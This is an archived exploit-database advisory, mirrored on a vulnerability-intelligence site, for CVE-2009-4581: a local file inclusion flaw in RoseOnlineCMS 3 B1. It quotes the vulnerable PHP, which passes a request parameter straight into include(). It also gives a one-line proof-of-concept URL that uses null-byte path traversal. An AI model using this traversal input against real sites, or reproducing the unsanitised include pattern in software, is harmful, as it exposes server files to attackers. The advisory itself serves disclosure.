Lucene search
+L

RoseOnlineCMS 3 B1 - 'admin' Local File Inclusion

🗓️ 30 Dec 2009 00:00:00Reported by cr4wl3rType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 40 Views

RoseOnlineCMS 3 B1 admin Local File Inclusion with Po

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-4581
30 Dec 200900:00
circl
cve
CVE
CVE-2009-4581
6 Jan 201021:33
cve
cvelist
Cvelist
CVE-2009-4581
6 Jan 201021:33
cvelist
nvd
NVD
CVE-2009-4581
6 Jan 201022:00
nvd
prion
Prion
Directory traversal
6 Jan 201022:00
prion
ptsecurity
Positive Technologies
PT-2010-1400 · Roseonline · Roseonlinecms
6 Jan 201000:00
ptsecurity
                            \#'#/
                            (-.-)
   --------------------oOO---(_)---OOo-------------------
   | RoseOnlineCMS <= 3 B1 (admin) Local File Inclusion |
   |      (works only with magic_quotes_gpc = off)      |
   ------------------------------------------------------
[!] Discovered: cr4wl3r <cr4wl3r[!]linuxmail.org>
[!] Download: http://sourceforge.net/projects/rosecms/files/
[!] Date: 30.12.2009
[!] Remote: yes

[!] Code :

<?PHP
if (isset($_GET['write'])) {
	$argv = explode('-',$_GET['write']);
	settype($argv,'array');
	$_GET['admin'] = @$argv[0];
	$_GET['url'] = @$argv[1];
	$_GET['do'] = @$argv[2];
	$_GET['key'] = @$argv[3];
}
$admin = !isset($_GET['admin']) ? index : $_GET['admin'] ;

   if (is_file("modules/admin/".$admin.".php")) {
   		include("modules/admin/".$admin.".php");

   } else {
		echo('Administrator page not found.
					<br><br> <a href=index.php>Click here to go back home</a>');
   }

ob_end_flush();
?>

[!] PoC:

    [RoseOnlineCMS_path]/modules/admincp.php?admin=[LFI%00]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 Dec 2009 00:00Current
7.2High risk
Vulners AI Score7.2
CVSS 26.8
CVSS 3.19.8
EPSS0.05236
40